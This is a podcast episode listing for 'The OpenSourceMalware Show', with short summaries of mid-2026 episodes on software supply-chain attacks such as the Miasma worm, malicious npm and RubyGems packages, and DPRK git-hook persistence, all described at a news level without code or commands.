The OpenSourceMalware Show

Episoder

• MSFT hit by Miasma worm, VS Code cooldowns, npm v12 breaking changes 11.06.2026 39min

  Miasma Worm Hits Microsoft — On June 5th, 73 Microsoft GitHub repositories were disabled in 105 seconds after being compromised by the Miasma worm. Four GitHub organizations were affected, including Azure Functions, which broke CI jobs worldwide for anyone calling those official GitHub Actions. The initial foothold traces back to a May 19th compromise of the Durable Task repo, with threat actors maintaining persistence via stolen credentials before returning to trigger the mass takedown. As o...
• Miasma npm worm hits Red Hat, new OpenSourceMalware research on 2026 trends, the Moika campaign 04.06.2026 40min

  This week Paul and Jenn talk about: Miasma Campaign — Starting June 1st with 32 Red Hat @redhat-cloud-services packages (averaging 80,000 weekly downloads) compromised, the campaign expanded to over 80 packages and 286+ malicious versions within days. The worm is the first confirmed in-the-wild use of TeamPCP's open-sourced MiniShai Hulud worm, though TeamPCP has not claimed credit. It is multi-ecosystem (npm, PyPI, RubyGems) and the Ruby variant appears to be LLM-translated, not part of the ...
• OSV false positives, Crowdstrike takedown of Glassworm infra, and MSFT nukes a researcher 28.05.2026 28min

  This week Jenn and Paul covered: OSV false positives from AWS Inspector: AWS's automated malware detection pipeline submitted 157 false positive entries to osv.dev. The entries were merged before anyone caught the errors. When the community began pointing out that some of those "false positives" were actually real malware, AWS started adding some back, making this a mess on both ends. AppSec vendors piled on publicly despite relying on OSV as their primary detection source without contributin...
• GitHub popped by malicious VS code extension, npm staged publishing debuts 21.05.2026 28min

  This week Jenn and Paul cover: npm Staged Publishing: npm's new feature adds a human approval checkpoint before a package goes live. Real improvement, real caveats. We walk through what it does, where it falls short, and the questions the docs still don't answer.DPRK Axios-Linked npm Packages: Paul discovered three malicious npm packages tied to the March Axios attacker that have been quietly harvesting credentials since early April. Classic DPRK multi-use attack infrastructure, built to supp...
• RubyGems bot attack, ShinyHunters ransom Canvas, and the latest on Mini Shai Hulud 14.05.2026 32min

  Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty for episode four! In this episode: RubyGems bot attack: Hundreds of bots pushed 500-plus packages to RubyGems, some carrying exploits, forcing the registry to shut down new account signups. Jenn and Paul break down why the DDoS label may be misleading and what this exposes about the friction-vs-safety tradeoff every open source registry faces.Canvas ransomware by ShinyHunters: ShinyHunters breached Instructure, the company behind t...
• Git hook persistence, Antrea compromise, Dirty Frag, cPanel exploitation, interpreted language malware 07.05.2026 27min

  Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty for episode three, covering the latest threat activity and a deep dive they've been promising since episode one. In this episode: DPRK Lazarus Group using git hooks: Paul's latest research shows the Contagious Interview / TaskJacker campaign has evolved. The initial loader is still the VS Code task.json file, but it now calls concatenated Git commands that drop malware via pre-commit and post-checkout git hooks, hiding the payload ...
• Lovable and Vercel incidents, GitHub RCE, EDR vs. AI agents, Mini Shai Halud by Team PCP 30.04.2026 25min

  Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty as they cover a week that had defenders everywhere ready to call it on 2026. In this episode, we cover four topics: Lovable and Vercel incident response failures: Two AI-native platforms had significant security incidents in recent weeks, and both initially responded by minimizing the severity. We break down why Lovable's regression exposed source code and full chat history to any free account holder (the mother of all IDORs), why ...
• Bitwarden CLI compromise, npm lifecycle scripts, OWASP cheat sheet, cross-ecosystem attacks 27.04.2026 37min

  Welcome to the very first episode of The OpenSourceMalware Show! Join OpenSourceMalware co-founders Jenn Gile and Paul McCarty as they break down the latest news, threats, and best practices in the open-source ecosystem. In this episode, we dive into four major topics: Bitwarden CLI Compromise: We analyze the recently discovered malicious version (2026.4.0) of the Bitwarden CLI package. We break down how this cloud-native infostealer silently executes via pre-install scripts to harvest...